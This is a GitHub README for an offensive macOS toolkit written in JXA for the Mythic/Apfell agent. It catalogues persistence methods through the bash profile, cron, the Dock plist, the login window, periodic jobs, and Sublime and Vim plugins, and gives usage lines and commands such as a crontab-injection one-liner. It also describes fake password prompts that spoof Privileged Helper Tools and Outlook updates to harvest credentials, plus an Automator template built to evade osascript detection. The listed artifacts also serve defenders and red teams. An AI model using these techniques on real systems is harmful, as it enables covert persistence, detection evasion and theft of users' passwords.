Skip to content
Go to file

Latest commit


Git stats


Failed to load latest commit information.


Collection of macOS persistence methods and miscellaneous tools in JXA
Related blog posts:


  • In Mythic (Apfell Agent) :
jsimport (Selected file)
jsimport_call <NameOfPersistenceScript>(ScriptArguments)
Project Description Usage Artifacts Created Commandline Commands Executed
BashProfilePersist Modifies user's bash profile to execute script if the persistence process (current implementation assumes osascript) is not already running. If Catalina system then .zshenv is modified.
Persistence executes on terminal open.
js_importcall BashProfilePersist('osascript -l JavaScript -e ...') $HOME/.security/
$HOME/.bash_profile or $HOME/.zshenv
sh $HOME/.security/

sh $HOME/.security/
CronJobPersistence Persistence using CronJobs. This script will create a hidden file ( in the current user's Public/Drop Box folder. Writes a cron job with a default interval of 15mins which executes the hidden script.
(Note: This command generates a user prompt for Catalina. If the user clicks “Don’t Allow” the command should fail with an “operation not permitted").
Persistence executes every 15 mins.
js_importcall CronJobPersistence('osascript -l JavaScript -e ...') $HOME/Public/Drop\ Box/
crontab entry
sh -c echo "$(echo '15 * * * * cd $HOME/Public/Drop\ Box/ && ./' ; crontab -l)" | crontab -

sh -c (Persistence Action)
DockPersist Modifies the apple dock plist for persistence. Requires an application to be present on target. Persistence executes upon user interaction. js_importcall DockPersist("Safari", "","yes")
js_importcall DockPersist("Google Chrome", "","yes")
/usr/bin/plutil -convert xml1 -o /private/tmp/temp9876 &

/usr/bin/plutil -convert binary1 -o /private/tmp/"randomname" &

/usr/bin/killall Dock
FinderSyncPlugins Persistence using Finder Sync Extensions. Requires and app on the target to be setup for abuse. It searches the app for the required files and registers them.
See for how to setup.
Persistence executes on login.
js_importcall FinderSyncPlugins('/Users/Shared/') N/A pluginkit -a </some/path/persist.appex> &

pluginkit -e use -i &
LoginScript Requires Root Modifies login window plist for persistence. Persistence executes on login. js_importcall LoginScript('osascript -l JavaScript -e ...') /var/root/Library/Preferences/

sh -c (Persistence Action)
PeriodicPersist Requires Root Create a daily job in /etc/periodic/daily. Persistence executes daily. js_importcall PeriodicPersist('osascript -l JavaScript -e ...') /etc/periodic/daily/111.clean-hist sh -c (Persistence Action)
SublimeTextAppScriptPersistence Persistence using the Sublime Text application script. Appends the application script for Sublime to execute our command..
Persistence executes upon Sublime opening.
See for more details.
js_importcall SublimeTextAppScriptPersistence('osascript -l JavaScript -e ...') modification to end of /Applications/Sublime\ sh -c (Persistence Action)
SublimeTextPluginPersistence Persistence using Sublime Text plugins. Creates a plugin file that is executed upon the opening of Sublime.
Persistence executes upon Sublime opening.
js_importcall SublimeTextPluginPersistence('/Users/Shared/inject.dylib') $HOME/Library/Application\ Support/Sublime\ Text\ [2 or 3] /PrettyText/ N/A
VimPluginPersistence Persistence using Vim plugins. Creates a plugin file that is executed upon the opening of vim.
Persistence executes upon vim opening.
js_importcall VimPluginPersistence('http://path/to/hosted/apfellpayload') $HOME/.vim/plugin/d.vim sh -c (Persistence Action)

Misc Scripts / Tools

Project Description Usage Artifacts Created Commandline Commands
DylibHijackScan JXA version of Patrick Wardle's tool that searches applications for dylib hijacking opportunities. May generate user pop up if looking into protected fodlers. Requires xcode installed on 10.14.1 js_importcall DylibHijackScan() N/A "sh -c lsof | tr -s ' ' | cut -d' ' -f9 | sed '/^$/d' | grep '^/'| sort | uniq"
sh -c file "placeholder"
sh -c otool -l "placeholder"
InjectCheck Process Injection Checker. The tool enumerates the Hardened Runtime, Entitlements, and presence of Electron files to determine possible injection opportunities js_importcall InjectCheck("All")
PrivilegedHelperToolSpoof Tools searches the installed Privileged Helper Tools "/Library/PrivilegedHelperTools" and leverages legitimate icons and information in an attempt to gain user password credentials. The tool prompts again (with slightly different text) if the first password entry is blank. If no helper tool then default prompt for creds. js_importcall PrivHelpToolSpoof() N/A sh -c launchctl plist __TEXT,__info_plist /Library/PrivilegedHelperTools/ | grep -A1 AuthorizedClients"
OutlookUpdatePrompt Tool which prompts the user for and update in an attempt to gain password credentials. Attempts to bring a prompt using outlook icon if installed otherwise uses standard cog. Returns credentials from prompt entry to the user. js_importcall OutlookUpdatePrompt() N/A N/A
WorkflowTemplate A template for Automator to execute JXA. This is to evade simple detections on commandline osascript. After replacing the placeholder (JXA PAYLOAD HERE) with the desired js script, it can be executed by /usr/bin/automator /path/to/file/Workflow.wflow. Requires the file to be on host but can be leveraged in combination with the above persistence methods /usr/bin/automator /path/to/file/Workflow.wflow /path/to/file/Workflow.wflow /usr/bin/automator /path/to/file/Workflow.wflow


Collection of macOS persistence methods and miscellaneous tools in JXA




No releases published


No packages published
You can’t perform that action at this time.